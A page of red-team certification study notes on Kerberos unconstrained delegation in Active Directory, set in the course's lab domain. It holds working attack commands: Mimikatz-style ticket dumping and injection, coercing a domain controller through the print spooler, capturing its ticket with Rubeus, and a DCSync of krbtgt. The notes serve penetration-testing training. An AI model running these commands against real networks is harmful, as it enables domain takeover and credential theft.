Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Unconstrained Delegation
  • Enumeration
  • Abusing Unconstrained Delegation
  • Coercion Techniques
  • Capturing and Reusing the TGT
  • Lab
  • Labs
  1. Certified Red Team Professional (CRTP) - Notes
  2. 7 - Kerberos Attack and Privelege Escalation
  3. 7.5 - Kerberos Delegation

Uncostrained Delegation

Unconstrained Delegation

Unconstrained delegation allows a service to impersonate a user to any other service in the domain. When this is enabled, the domain controller includes the user's TGT in the TGS. The TGT is then extracted by the service and stored in LSASS, allowing it to be reused for impersonation. This behavior makes unconstrained delegation highly abusable.

Delegation Process Flow:

  1. A user authenticates to the Domain Controller and receives a TGT.

  2. The user requests a TGS for a service (e.g., a web server).

  3. The user sends both the TGT and the TGS to the service.

  4. The service extracts the user's TGT and requests a new TGS to access another resource (e.g., a database server).

  5. The service authenticates to the second server as the user.


Enumeration

To identify domain machines or users with unconstrained delegation enabled:

  • PowerView:

    Get-DomainComputer -Unconstrained
  • ActiveDirectory Module:

    Get-ADComputer -Filter {TrustedForDelegation -eq $True}
    Get-ADUser -Filter {TrustedForDelegation -eq $True}

Abusing Unconstrained Delegation

  1. Compromise a server with unconstrained delegation enabled.

  2. Wait for or coerce a domain admin to authenticate to it.

  3. Dump cached TGTs:

    SafetyKatz.exe "sekurlsa::tickets /export"
  4. Inject a Domain Admin’s TGT:

    SafetyKatz.exe "kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"

Coercion Techniques

Certain Windows services allow any authenticated user to coerce one machine into authenticating to another. These include:

Protocol
Service
Default Enabled
Port

MS-RPRN

Print Spooler

Yes

445 SMB

MS-WSP

Windows Search

No

445 SMB

MS-DFSNM

DFS Namespace Mgmt

No

445 SMB

Use these coercion techniques to force authentication from a DC to a controlled host.


Capturing and Reusing the TGT

  1. On the attacker's controlled server (e.g., dcorp-appsrv), monitor for TGTs:

    Rubeus.exe monitor /interval:5 /nowrap
  2. On the student's VM, coerce authentication using MS-RPRN:

    MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
  3. Once the TGT is captured (Base64 encoded), inject it into memory:

    Rubeus.exe ptt /ticket:<Base64_TGT>
  4. Dump secrets using DCSync:

    SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"

Lab

  • Learning Object 15

Labs

Previous7.5 - Kerberos DelegationNextConstrained Delegation

Last updated 2 days ago

📝
9️⃣
Learning Object 16 lab
Learning Object 17 lab